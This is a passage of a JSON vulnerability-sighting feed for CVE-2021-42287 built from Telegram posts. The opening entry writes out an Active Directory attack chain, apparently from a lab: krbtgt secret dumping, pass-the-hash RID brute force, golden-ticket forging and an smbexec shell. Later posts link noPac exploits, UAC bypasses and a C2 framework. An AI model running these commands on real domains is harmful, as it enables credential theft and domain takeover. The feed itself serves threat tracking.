\u043a\u043b\u044e\u0447\u0438 \u0443\u0447\u0435\u0442\u043a\u0438 krbtgt:\nimpacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt\n\n# \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c RID-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440 RID+user (\u0442\u0443\u0442 \u044f \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Pass-the-Hash):\ncrackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute\n\n# \u0412\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442:\nimpacket-ticketer -aesKey\nc8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova\n\n# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0438\u0441\u044c \u0432 /etc/hosts, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Kerberos \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0441\u043b\u0443\u0436\u0431:\necho '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts\n\n# \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c smbexec \u0441 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u043c \u0437\u043e\u043b\u043e\u0442\u044b\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c:\nexport KRB5CCNAME=amaslova.ccache\nimpacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u043a \u043f\u043e\u0441\u0442\u0443 (\u043d\u0438\u0436\u0435) \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0430\u0445. \u041d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u0432\u0438\u0434\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u2014 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 amaslova!", "creation_timestamp": "2024-04-04T13:08:07.000000Z"}, {"uuid": "4a4eb245-5842-4332-a66f-846040e290ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/m1swarr1or/29", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\n\u0441\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2021-12-12T14:54:29.000000Z"}, {"uuid": "1ec943d9-a4b9-4aa0-b4ea-4632a7edcbe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/poxek/314", "content": "#news Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287 \u0438 CVE-2021-42278, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441\u043b\u0443\u0436\u0431\u044b \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n\n@tomhunter", "creation_timestamp": "2021-12-22T18:21:21.000000Z"}, {"uuid": "b6ed5ae9-044e-4b04-8d2a-4432e2b40b00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/270", "content": "CVE-2021-42287 / CVE-2021-42278: impersonate DA from standard domain user\n\nScanner and exploit in C # :\nhttps://github.com/cube0x0/noPac\n\nPython exploit for kali : https://github.com/WazeHell/sam-the-admin\n\n@dnevnik_infosec", "creation_timestamp": "2021-12-18T15:24:11.000000Z"}, {"uuid": "7b90f8ca-9ee3-44cd-9ae6-902cd05340f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/bizone_channel/425", "content": "\u041a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0436\u0438\u043d\u0433\u043b \u0431\u0435\u043b\u0437. \u041f\u043e\u0434\u0431\u043e\u0440\u043a\u0430 \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439 \u0437\u0430 \u0434\u0435\u043a\u0430\u0431\u0440\u044c\ud83c\udf84\n\n\u041f\u043e\u0436\u0430\u043b\u0443\u0439, \u0441\u0430\u043c\u044b\u043c \u0433\u0440\u043e\u043c\u043a\u0438\u043c \u0438\u043d\u0444\u043e\u043f\u043e\u0432\u043e\u0434\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0430 \u0441\u0442\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell. \u041c\u044b \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u043e \u043d\u0435\u0439, \u043a\u043e\u0433\u0434\u0430 \u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441\u0432\u043e\u0438\u043c \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u043c. \u0422\u0435\u043f\u0435\u0440\u044c \u0445\u043e\u0442\u0438\u043c \u043e\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u0441\u043e\u0431\u044b\u0442\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0432\u043b\u0435\u043a\u043b\u043e \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0430. \n\n\ud83d\udd10Log4Shell \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Intel, NVIDIA \u0438 Microsoft \u2014 \u0432\u0441\u0435 \u043e\u043d\u0438 \u043f\u043e\u0432\u0441\u0435\u043c\u0435\u0441\u0442\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0431\u0438\u0437\u043d\u0435\u0441\u0435. \u0414\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0430\u044f \u0431\u0440\u0435\u0448\u044c \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0439 \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0436\u0438\u043b\u043e\u0439. \u0422\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Check Point, \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 60, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u043e 100 \u0430\u0442\u0430\u043a \u0432 \u043c\u0438\u043d\u0443\u0442\u0443. \u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0441\u0432\u0435\u0436\u0438\u0439 \u0431\u0430\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u043e\u0432 \u2014 Conti.\n\n\ud83d\udda5Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445: CVE-2021-42287 \u0438 CVE-2021-42278, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows. \u042d\u0442\u043e \u0434\u0430\u0435\u0442 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0447\u0442\u0438 \u0431\u0435\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0438.\n\n\ud83d\udea8Google \u043f\u043e\u0434\u0430\u043b\u0430 \u0432 \u0441\u0443\u0434 \u043d\u0430 \u0434\u0432\u0443\u0445 \u0440\u043e\u0441\u0441\u0438\u044f\u043d \u0437\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Glupteba, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0440\u0430\u0437\u0438\u043b \u0431\u043e\u043b\u0435\u0435 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u043d\u0430 \u041e\u0421 Windows. \n\n\ud83c\udfaf\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u043e\u043c Kronos \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0435 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0432\u0435\u043b\u0430 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0435\u0433\u043e \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b.\n\n\ud83d\udc41\u0412\u043b\u0430\u0441\u0442\u0438 \u041f\u043e\u043b\u044c\u0448\u0438 \u0443\u043b\u0438\u0447\u0438\u043b\u0438 \u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0433\u043e \u041f\u041e Pegasus \u0434\u043b\u044f \u0441\u043b\u0435\u0436\u043a\u0438 \u0437\u0430 \u043e\u043f\u043f\u043e\u0437\u0438\u0446\u0438\u0435\u0439. \u0412\u0438\u0434\u0438\u043c\u043e, \u0434\u0430\u0436\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0435\u043d\u0438\u0439 \u043d\u0435 \u043c\u0435\u0448\u0430\u0435\u0442 NSO Group \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c.\n\n\ud83d\udd78\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 LastPass \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0432\u043e\u0439\u0442\u0438 \u0432 \u0438\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0441 \u043c\u0430\u0441\u0442\u0435\u0440-\u043f\u0430\u0440\u043e\u043b\u0435\u043c. \u042d\u0442\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0438 \u0432 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432.\n\n\u0412\u043e\u0432\u0440\u0435\u043c\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0439\u0442\u0435 \u041f\u041e \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0438 \u0431\u0443\u0434\u044c\u0442\u0435 \u043d\u0430\u0447\u0435\u043a\u0443!\n\n#securitynews", "creation_timestamp": "2021-12-29T10:52:54.000000Z"}, {"uuid": "9bb80e80-e09b-4bda-a16a-4825ac95e36d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/arpsyndicate/1198", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 108 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.928080000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T12:00:54.000000Z"}, {"uuid": "aa128fc7-8be3-4946-aff1-5d6d377ac962", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/anwar1213xx/1565", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:34.000000Z"}, {"uuid": "58ed00f9-7095-4a6d-87cc-2c27413996d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/arpsyndicate/231", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 104 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.926130000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-11-17T07:24:39.000000Z"}, {"uuid": "fa43658e-5055-4f88-a829-a859f041f694", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/piratesofyemen1213/236", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:19.000000Z"}, {"uuid": "2e73bf48-3db2-4191-bc42-8744161d26fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanOfficial/301", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads pass file content scanners, but more importantly to avoid having Mark-Of-The-Web flag on their files. There're various motives on why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, \n\nScout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or Out-of-band resource load by adding OAST host like Burp Collaborator to the parameter value, above of all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target, i was thinking about how can i get vulnerable parameter/endpoint , Hence i made a simple feature is that allowed you to add some pieces of information of the target in your OAST host as a variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T10:44:27.000000Z"}, {"uuid": "437cb85a-f008-4564-bbd9-db5a2e9d090e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/arpsyndicate/1557", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 107 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.924660000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-08T12:18:23.000000Z"}, {"uuid": "ec3c388a-dbc1-4c39-8c07-90552019b85a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/piratesofyemen/398", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 